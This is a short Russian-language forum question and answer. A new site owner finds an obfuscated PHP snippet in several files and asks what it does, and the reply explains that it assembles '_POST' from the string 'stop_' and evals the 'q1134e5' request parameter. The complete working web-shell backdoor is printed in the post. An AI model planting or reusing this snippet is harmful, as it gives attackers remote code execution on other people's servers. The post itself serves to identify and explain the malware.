Недавно взял на себя веб-сайт и нашел следующий код в нескольких файлах, считая его злонамеренным:
<?php $qV="stop_"; $s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]); if(isset(${$s20}['q1134e5'])){eval(${$s20}['q1134e5']);} ?>
Любые идеи о том, что он делает?
Кажется: первая строка – _POST; – вторая строка проверяет, является ли _POST действительным, и принимает параметр «q1134e5» из сообщения и выполняет его.
Читайте, почему это опасно http://php.net/manual/en/function.eval.php